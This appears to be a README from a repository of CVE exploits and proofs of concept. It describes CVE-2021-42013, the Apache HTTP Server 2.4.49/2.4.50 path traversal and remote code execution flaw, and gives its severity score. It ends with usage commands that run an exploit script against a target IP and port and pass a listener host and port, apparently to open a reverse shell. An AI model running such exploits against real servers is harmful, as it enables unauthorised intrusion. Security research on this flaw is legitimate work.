A repo containing exploits and POC of multiple CVEs
CVE-2021-42013 is a notable vulnerability discovered in Apache HTTP Server versions 2.4.49 and 2.4.50. It was observed that the solution for an earlier vulnerability, CVE-2021-41773, in Apache HTTP Server 2.4.50 was not adequate. This led to the emergence of CVE-2021-42013, which allows an attacker to exploit a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration “require all denied”, these requests can succeed. Moreover, if CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.
The criticality of this vulnerability is highlighted by its CVSS score. The National Vulnerability Database (NVD) has assigned it a CVSS 3.x base score of 9.8, categorizing it as CRITICAL.
chmod +x exploit.sh
./exploit.sh <target_ip> <target_port> <lhost> <lport>